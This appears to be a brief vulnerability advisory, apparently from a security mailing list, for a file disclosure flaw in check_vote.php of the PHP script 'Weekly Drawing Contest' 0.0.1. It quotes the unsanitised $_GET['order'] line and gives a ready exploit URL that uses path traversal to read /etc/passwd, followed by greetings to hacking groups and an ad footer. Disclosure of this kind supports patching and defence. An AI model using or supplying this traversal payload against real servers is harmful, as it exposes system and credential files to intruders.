Weekly Drawing Contest <= (check_vote.php) Remote File Disclosure Vuln

["BorN To K!LL BorN To K!LL" <q.t.i@xxxxxxxxxxx>]

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Weekly Drawing Contest <= (check_vote.php) Remote File Disclosure Vuln

Script: Weekly Drawing Contest

Version: 0.0.1

S!Te: http://www.hotscripts.com/jump.php?listing_id=52638&jump_type=1

Discover: BorN To K!LL

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:
check_vote.php

Code:
$order = $_GET[ "order" ];

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

ExploiT:
~~~~~
wWw.SiTe.cOm/[path]/check_vote.php?order=../../../../etc/passwd

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

GreeTz 2:
Dr.2  -  str0ke  -  AsbMay  ....

KuW-SeC.cC  &  Asb-May.net

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/